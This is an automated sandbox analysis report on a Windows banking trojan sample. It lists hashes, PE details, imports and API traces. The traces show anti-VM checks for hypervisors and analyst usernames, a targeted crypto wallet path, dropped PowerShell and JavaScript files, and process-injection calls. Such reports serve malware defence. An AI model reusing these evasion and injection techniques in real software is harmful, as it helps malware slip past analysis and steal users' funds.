Start date and time:	2024-04-16 15:27:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Detection:	MAL
Classification:	mal88.bank.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 5 Number of non-executed functions: 68
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.899033758996376
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
File size:	182'272 bytes
MD5:	69b4504419872fee9bc3bc996b88eb4b
SHA1:	f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256:	0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
SHA512:	42cfa507f0ff1f4baecb45a7bd02cbe21165e5e23b1fb8ad4189c4e7fe509935781cc8a0c5c2eb046d4031d1ed3f218f7927b3d6fa96d0f5b97ee302b8a8944b
SSDEEP:	3072:TCmlA+2TGMF85+bkRG32foUP9GmPe97UoiBwASziH8shMpy4a7tzHhL1NZ:WmlV4h8JG3QUzoTnhM84a7trhL1NZ
TLSH:	FC047D0030D4D2B3D5722A33169346C5A93DFA719F96CAFB270C795D87B05A29B32DA2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x403d44
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007FF8553C173Ch
jmp 00007FF8553C11AFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041105Ch]
push dword ptr [ebp+08h]
call dword ptr [00411058h]
push C0000409h
call dword ptr [0041100Ch]
push eax
call dword ptr [00411014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00411060h]
test eax, eax
je 00007FF8553C1337h
push 00000002h
pop ecx
int 29h
mov dword ptr [00418A78h], eax
mov dword ptr [00418A74h], ecx
mov dword ptr [00418A70h], edx
mov dword ptr [00418A6Ch], ebx
mov dword ptr [00418A68h], esi
mov dword ptr [00418A64h], edi
mov word ptr [00418A90h], ss
mov word ptr [00418A84h], cs
mov word ptr [00418A60h], ds
mov word ptr [00418A5Ch], es
mov word ptr [00418A58h], fs
mov word ptr [00418A54h], gs
pushfd
pop dword ptr [00418A88h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00418A7Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00418A80h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00418A8Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [004189C8h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17690	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x13c40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0x1130	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16698	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x165d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfbea	0xfc00	f80c6e36c0496492e658927e9cbd2f9a	False	0.5602368551587301	data	6.555752738036374	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x6d0c	0x6e00	06a44f2522af6deb8eae500514137c22	False	0.4388494318181818	OpenPGP Public Key	4.883697607623019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x163c	0xa00	b55402247df1a6c6692e0c2bccb8e505	False	0.1765625	data	2.3846615292625706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x13c40	0x13e00	ad6b64a3eb4456238b7b6cc15ca6feec	False	0.49750638757861637	data	4.908644275138926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0x1130	0x1200	6250f4910a879ac182f4b8379731bb76	False	0.7437065972222222	data	6.405937874038831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1a118	0x18c	data	English	United States	0.6464646464646465
RT_RCDATA	0x1a2a4	0x1a	data	English	United States	1.3461538461538463
RT_RCDATA	0x1a2c0	0x13800	data	English	United States	0.4989483173076923
RT_MANIFEST	0x2dac0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	15:28:10
Start date:	16/04/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe"
Imagebase:	0xfb0000
File size:	182'272 bytes
MD5 hash:	69B4504419872FEE9BC3BC996B88EB4B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	17.3%
Signature Coverage:	16.9%
Total number of Nodes:	1244
Total number of Limit Nodes:	10

Executed Functions

Function 005A8610 Relevance: 196.6, APIs: 73, Strings: 39, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005A864E
StrStrIW.KERNELBASE(?,Hyper-V), ref: 005A866D
StrStrIW.SHLWAPI(?,VMWare), ref: 005A8683
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005A8699
StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005A86AF
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005A86C4
GetModuleHandleA.KERNEL32(kernel32), ref: 005A86CF
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A86E3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A86EE
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005A871D
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005A8730
GetFileAttributesW.KERNELBASE(?), ref: 005A873F
GetFileAttributesW.KERNEL32(?), ref: 005A8751

Strings

%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 005A8B05
xlsx, xrefs: 005A8D33
7, xrefs: 005A8AB2
Parallels Display Adapter, xrefs: 005A868D
PJones, xrefs: 005A8B8D
powershell.exe, xrefs: 005A8DA6
Recently.docx, xrefs: 005A87CC
SFTOR-PC, xrefs: 005A8BF9
doc, xrefs: 005A8D0C
%systemroot%\System32\VBoxTray.exe, xrefs: 005A872B
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 005A8ABC
Files.docx, xrefs: 005A87EB
sal.rosenburg, xrefs: 005A8BA2
xls, xrefs: 005A8D27
FORTI-PC, xrefs: 005A8BF2
Hyper-V, xrefs: 005A8660
%systemroot%\System32\VBoxService.exe, xrefs: 005A8718
Resource.txt, xrefs: 005A8854
d5.vc/g, xrefs: 005A8BCF
L"Zh"Z|"Z, xrefs: 005A8C03
new songs.txt, xrefs: 005A8A0E
Opened.docx, xrefs: 005A87D3
Paul Jones, xrefs: 005A8B86
WILLCARTER-PC, xrefs: 005A8BE9
VMWare, xrefs: 005A8677
BAIT, xrefs: 005A89A8, 005A89BA
Joe Cage, xrefs: 005A8B78
docx, xrefs: 005A8D1B
Wow64RevertWow64FsRedirection, xrefs: 005A86E5
OpenVPN.txt, xrefs: 005A8863
Are.docx, xrefs: 005A87E4
Red Hat QXL controller, xrefs: 005A86A3
Wow64DisableWow64FsRedirection, xrefs: 005A86DD
Z< Z, xrefs: 005A87DA, 005A87F5
kernel32, xrefs: 005A86CA
WDAGUtilityAccount, xrefs: 005A8B9B
Harry Johnson, xrefs: 005A8B94
STRAZNJICA.GRUBUTT, xrefs: 005A8B7F
These.docx, xrefs: 005A87DD

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
String ID: Z< Z$%appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$Are.docx$BAIT$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$L"Zh"Z|"Z$OpenVPN.txt$Opened.docx$PJones$Parallels Display Adapter$Paul Jones$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 4266617301-2859681792
Opcode ID: feeac03217a8293d6ab6e8652c6bf934ae28473dd53438592882123e67f5ec93
Instruction ID: ff3ce83028750cb7756ef2a363d569ca636a36d399127bf3cbde11f830a06599
Opcode Fuzzy Hash: feeac03217a8293d6ab6e8652c6bf934ae28473dd53438592882123e67f5ec93
Instruction Fuzzy Hash: 0C228A71900219AEEF209BA4DC4DFEEBFB8FF06710F1445A5E514E2190EB749A49DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00FB132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00FB1343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00FB1439
GetProcAddress.KERNEL32(00000000), ref: 00FB1440
LoadLibraryA.KERNELBASE(?), ref: 00FB1459

Strings

kernel32, xrefs: 00FB1325, 00FB1434
LoadLibraryA, xrefs: 00FB142F

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: 72e8c750a7e6669d5bac5bfc5b5f540792ddabeb5d4067e3a61ff44889ea36e7
Instruction ID: 1717f2da36e81957ba1bae7e65edaefa52393d54212194bb17fa1289214cc813
Opcode Fuzzy Hash: 72e8c750a7e6669d5bac5bfc5b5f540792ddabeb5d4067e3a61ff44889ea36e7
Instruction Fuzzy Hash: C9D13675E00219DFCB18CF99D9A0AEEB7B2FF88304F648119E406AB395D734A981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00FB2F77
GetLastError.KERNEL32 ref: 00FB2F81
ExitProcess.KERNEL32 ref: 00FB2F8E
BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00FB2F9D
GetCurrentProcess.KERNEL32(00000000), ref: 00FB2FA9
TerminateProcess.KERNEL32(00000000), ref: 00FB2FB0

Strings

jhl46745fghb, xrefs: 00FB2F98

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
String ID: jhl46745fghb
API String ID: 3772419538-1856006033
Opcode ID: 587b9a121cc8ae08be9ef4468bc76c753a2d83f250b3c088730ac67074c35975
Instruction ID: 1d6336789818c4a91ed866542abc7d75cdcfdbfeaf88a33aa9797660379d1dae
Opcode Fuzzy Hash: 587b9a121cc8ae08be9ef4468bc76c753a2d83f250b3c088730ac67074c35975
Instruction Fuzzy Hash: 2B012D34A80248ABD760AFA1DE0BF9D7774BF05701F104058E506AB195DB749954AF51

Uniqueness

Uniqueness Score: -1.00%

Function 005A8DC0 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32 ref: 005A8DC6
ExitProcess.KERNEL32 ref: 005A8E6E

Part of subcall function 005A8610: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 005A864E
Part of subcall function 005A8610: StrStrIW.KERNELBASE(?,Hyper-V), ref: 005A866D
Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,VMWare), ref: 005A8683
Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 005A8699
Part of subcall function 005A8610: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 005A86AF
Part of subcall function 005A8610: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 005A86C4
Part of subcall function 005A8610: GetModuleHandleA.KERNEL32(kernel32), ref: 005A86CF
Part of subcall function 005A8610: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A86E3
Part of subcall function 005A8610: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A86EE
Part of subcall function 005A8610: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 005A871D
Part of subcall function 005A8610: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 005A8730
Part of subcall function 005A8610: GetFileAttributesW.KERNELBASE(?), ref: 005A873F
Part of subcall function 005A8610: GetFileAttributesW.KERNEL32(?), ref: 005A8751

Part of subcall function 005A8330: InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352
Part of subcall function 005A8330: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
Part of subcall function 005A8330: StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
Part of subcall function 005A8330: wsprintfA.USER32 ref: 005A83EF
Part of subcall function 005A8330: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
Part of subcall function 005A8330: GetLastError.KERNEL32 ref: 005A840E
Part of subcall function 005A8330: WSAStartup.WS2_32(00000202,?), ref: 005A844C
Part of subcall function 005A8330: CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
Part of subcall function 005A8330: CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481

Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 005A7181
Part of subcall function 005A7160: lstrlenW.KERNEL32(?), ref: 005A718A
Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 005A71A5
Part of subcall function 005A7160: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 005A71B3
Part of subcall function 005A7160: GetLastError.KERNEL32 ref: 005A71BD
Part of subcall function 005A7160: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 005A71D4
Part of subcall function 005A7160: wnsprintfW.SHLWAPI ref: 005A71EE
Part of subcall function 005A7160: SetFileAttributesW.KERNEL32(?,00000006), ref: 005A720E

Part of subcall function 005A8F20: CryptGenRandom.ADVAPI32(00000020,?), ref: 005A8F38
Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A8F95
Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A8F9C
Part of subcall function 005A8F20: wsprintfA.USER32 ref: 005A8FCF
Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9008
Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A900B
Part of subcall function 005A8F20: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A9010
Part of subcall function 005A8F20: HeapFree.KERNEL32(00000000), ref: 005A9013

Part of subcall function 005A7640: LsaOpenPolicy.ADVAPI32(00000000,005AA060,00000001,?), ref: 005A767C
Part of subcall function 005A7640: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005A768F
Part of subcall function 005A7640: GetProcessHeap.KERNEL32(00000008,?), ref: 005A76AB
Part of subcall function 005A7640: HeapAlloc.KERNEL32(00000000), ref: 005A76B2
Part of subcall function 005A7640: LsaFreeMemory.ADVAPI32(?), ref: 005A76EC
Part of subcall function 005A7640: LsaClose.ADVAPI32(?), ref: 005A76F5
Part of subcall function 005A7640: GetComputerNameW.KERNEL32(?,?), ref: 005A7714
Part of subcall function 005A7640: GetUserNameW.ADVAPI32(?,00000101), ref: 005A7725

Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 005A8541
Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 005A8554
Part of subcall function 005A8520: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A8567
Part of subcall function 005A8520: GetFileAttributesW.KERNEL32(?), ref: 005A858D
Part of subcall function 005A8520: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 005A85BD
Part of subcall function 005A8520: wnsprintfW.SHLWAPI ref: 005A85E0
Part of subcall function 005A8520: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 005A8602

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
String ID:
API String ID: 1304186597-0
Opcode ID: 9c3b830738af04e7596d85d951e3b779660936d6e02956b01fc0e61070ff7b0c
Instruction ID: b89bf33a21fb6c939c14d32db20913ce0adbdc813663354651230b6fe88e35ca
Opcode Fuzzy Hash: 9c3b830738af04e7596d85d951e3b779660936d6e02956b01fc0e61070ff7b0c
Instruction Fuzzy Hash: 3F017D5CA061068AEE34755884253BD3D4AFFC3B21FC8813A6BD64BDC59D041E87436F

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB1110: GetModuleHandleA.KERNEL32(kernel32), ref: 00FB111B
Part of subcall function 00FB1110: GetModuleHandleW.KERNEL32(00000000), ref: 00FB1162

GetUserDefaultLangID.KERNELBASE ref: 00FB1824

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule$DefaultLangUser
String ID:
API String ID: 3410018322-0
Opcode ID: a8ec003bae38d0151cbcd2b953d72c2489502204521b5b23b3adfd11d15d4753
Instruction ID: 79d3d1806e7bd8fe1ce8b71a679bfd242c2b38ed84da5cc7e8884a17b1b345de
Opcode Fuzzy Hash: a8ec003bae38d0151cbcd2b953d72c2489502204521b5b23b3adfd11d15d4753
Instruction Fuzzy Hash: EF4137B5E002099FCF04DF99D895AEEB7F5BF48304F148558E505A7341DB38AA41DFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 005A5E60 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 005A5E7D
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005A5E91
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005A5E9C
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005A5EA7
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005A5EB2
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005A5EBD
GetTempPathW.KERNEL32(000000F6,?), ref: 005A5ED6

Part of subcall function 005A2490: GetTickCount.KERNEL32 ref: 005A2492

wnsprintfW.SHLWAPI ref: 005A5F11
PathCombineW.SHLWAPI(?,?,?), ref: 005A5F2B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005A5F52
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005A5F76
SetEndOfFile.KERNEL32(00000000), ref: 005A5F79
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A5F86
wnsprintfW.SHLWAPI ref: 005A5FA4
RtlInitUnicodeString.NTDLL(?,?), ref: 005A5FBA
RtlInitUnicodeString.NTDLL(?,?), ref: 005A5FC7
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 005A6006
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A6055
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 005A609F
FlushFileBuffers.KERNEL32(00000000), ref: 005A60A7
SetEndOfFile.KERNEL32(00000000), ref: 005A60AE
NtQueryInformationProcess.NTDLL ref: 005A60C3
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005A60EB
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 005A6142
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005A617E
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005A618C
NtClose.NTDLL ref: 005A61C5
NtClose.NTDLL ref: 005A61D6
NtClose.NTDLL ref: 005A61E0
CloseHandle.KERNEL32(00000000), ref: 005A61E3

Strings

.exe, xrefs: 005A5EEF
"%s", xrefs: 005A5F93
ntdll, xrefs: 005A5E75
NtCreateSection, xrefs: 005A5E8B
NtCreateProcessEx, xrefs: 005A5E93
RtlDestroyProcessParameters, xrefs: 005A5EA9
RtlCreateProcessParametersEx, xrefs: 005A5E9E
%08x%s, xrefs: 005A5F00
NtCreateThreadEx, xrefs: 005A5EB4

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
